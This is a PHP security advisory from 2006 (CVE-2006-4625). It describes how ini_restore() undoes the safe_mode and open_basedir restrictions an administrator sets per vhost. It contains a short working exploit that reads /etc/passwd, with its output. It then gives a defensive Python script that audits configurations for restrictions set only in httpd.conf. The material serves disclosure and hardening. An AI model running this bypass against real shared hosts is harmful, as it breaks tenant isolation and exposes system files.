-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]


Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- Written: 05.09.2006
- Public: 09.09.2006
SecurityAlert Id: 42
CVE: CVE-2006-4625
SecurityRisk: High
Affected Software: PHP 5.1.6 / 4.4.4 <= x
Advisory URL: http://securityreason.com/achievement_securityalert/42
Vendor: http://www.php.net

--- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This cannot be used in .htaccess files. Any directive type set with php_admin_value cannot be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.
php_admin_flag name on|off

Used to set a boolean configuration directive. This cannot be used in .htaccess files. Any directive type set with php_admin_flag cannot be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

--- 1. php_admin_value and php_admin_flag Bypass ---
When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g. httpd.conf). These options are used by many ISPs to set open_basedir, safe_mode and other directives.

For example, open_basedir in httpd.conf:

---

Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/

---

Every PHP configuration directive has two values: the Local Value and the Master Value. See phpinfo() or ini_get() for details.

Example:
If safe_mode or open_basedir (etc.) is set as the Local Value for selected users while the Master Value is still the default, the Local Value can be reset to the Master Value with the ini_restore() function!

---
ini_restore

(PHP 4, PHP 5)
ini_restore -- Restores the value of a configuration option
---

It restores the value from the php.ini file, so the PHP options set in httpd.conf are bypassed.

EXPLOIT:
---
<?php
echo ini_get("safe_mode");     // Local Value set by php_admin_flag in httpd.conf
echo ini_get("open_basedir");  // Local Value set by php_admin_value in httpd.conf
include("/etc/passwd");        // blocked: open_basedir restriction in effect
ini_restore("safe_mode");      // reset both directives to the php.ini Master Value
ini_restore("open_basedir");
echo ini_get("safe_mode");     // now prints the (empty) default
echo ini_get("open_basedir");
include("/etc/passwd");        // now succeeds
?>
---

RESULT OF EXPLOIT:
---
1
/usr/home/frajer/public_html/
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in /usr/home/frajer/public_html/ini_restore.php on line 4
# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....
---

This issue is very dangerous, because an administrator cannot reliably enforce open_basedir or safe_mode for all users.

--- 2. How to fix ---
Fixed in CVS HEAD, PHP_5_2, PHP_5_1 and PHP_4_4.

http://cvs.php.net/viewcvs.cgi/php-src/NEWS
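
As an added example (not part of the advisory or of PHP), the following Python script applies the Local/Master distinction described above to configuration files: it lists the php_admin_value/php_admin_flag restrictions in a vhost fragment and reports which of them have no matching value in php.ini. The reasoning is the advisory's own: ini_restore() resets a directive to the php.ini Master Value, so a restriction that exists only in httpd.conf is exactly the one that can be undone, while a restriction that is also set in php.ini survives a restore. The check for ini_restore in disable_functions is an extra hardening point added here, not something the advisory discusses. The httpd.conf sample is the fragment shown above; the php.ini excerpt is constructed for this example.

```python
"""Audit which php_admin_* restrictions could be undone by ini_restore().

ini_restore() resets a directive's Local Value (set per vhost in httpd.conf)
to the Master Value (from php.ini). A restriction present only in httpd.conf
therefore disappears once restored; the same restriction set in php.ini too
leaves nothing weaker to fall back to. The config excerpts below are
constructed sample input for this example.
"""
import re

# Directives the advisory is about.
SECURITY_DIRECTIVES = ("open_basedir", "safe_mode")

# Sample vhost fragment, taken from the advisory's httpd.conf example.
SAMPLE_HTTPD_CONF = """\
Options FollowSymLinks MultiViews Indexes
AllowOverride None
php_admin_flag safe_mode 1
php_admin_value open_basedir /usr/home/frajer/public_html/
"""

# Constructed php.ini excerpt: safe_mode is set globally, open_basedir is not,
# and disable_functions is empty.
SAMPLE_PHP_INI = """\
; constructed sample php.ini
safe_mode = On
disable_functions =
; open_basedir deliberately left at its default (unset)
"""

_ADMIN_RE = re.compile(r"^\s*php_admin_(?:value|flag)\s+(\S+)\s+(.*?)\s*$", re.IGNORECASE)
_INI_RE = re.compile(r"^([A-Za-z_.]+)\s*=\s*(.*)$")


def parse_admin_directives(httpd_conf):
    """Return {directive: value} for every php_admin_value/php_admin_flag line."""
    found = {}
    for line in httpd_conf.splitlines():
        m = _ADMIN_RE.match(line)
        if m:
            found[m.group(1).lower()] = m.group(2)
    return found


def parse_php_ini(php_ini):
    """Return {directive: value} for php.ini assignments; comments and sections skipped."""
    found = {}
    for line in php_ini.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith((";", "#", "[")):
            continue
        m = _INI_RE.match(stripped)
        if m:
            found[m.group(1).lower()] = m.group(2).strip().strip('"')
    return found


def audit(httpd_conf, php_ini):
    """Classify each php_admin_* security directive by its php.ini backing.

    'exposed': restricted in httpd.conf only; ini_restore() would drop it.
    'covered': also set in php.ini, so the Master Value keeps the restriction.
    'ini_restore_disabled': True if disable_functions already lists ini_restore.
    """
    admin = parse_admin_directives(httpd_conf)
    ini = parse_php_ini(php_ini)
    disabled = {f.strip().lower() for f in ini.get("disable_functions", "").split(",") if f.strip()}
    report = {"exposed": [], "covered": [],
              "ini_restore_disabled": "ini_restore" in disabled}
    for name in SECURITY_DIRECTIVES:
        if name not in admin:
            continue  # not enforced via php_admin_*; nothing for ini_restore to undo
        # An unset or empty php.ini value is exactly what ini_restore() falls back to.
        if ini.get(name):
            report["covered"].append(name)
        else:
            report["exposed"].append(name)
    return report


if __name__ == "__main__":
    for key, value in audit(SAMPLE_HTTPD_CONF, SAMPLE_PHP_INI).items():
        print(f"{key}: {value}")
```

On the sample input the script lists open_basedir as exposed and safe_mode as covered, which is the gap the exploit above relies on: the vhost narrows open_basedir, but the Master Value in php.ini is empty, so a restore lifts it. On builds that predate the fix, setting a restrictive open_basedir in php.ini as well (one broad enough to cover every vhost's document root) or listing ini_restore in disable_functions via php_admin_value leaves the restore with nothing weaker to fall back to.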

--- 3. Greets ---

For: sp3x
and
p_e_a, l5x

--- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

Regards
SecurityReason
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (FreeBSD)

iD8DBQFFApZZ3Ke13X/fTO4RAmA4AJ9g4rA0hqST7Px7i03RGpE1bmZmrgCgmt0a
SvP3KPhmLtZcCNFmtGa8oJ8=
=bqQV
-----END PGP SIGNATURE-----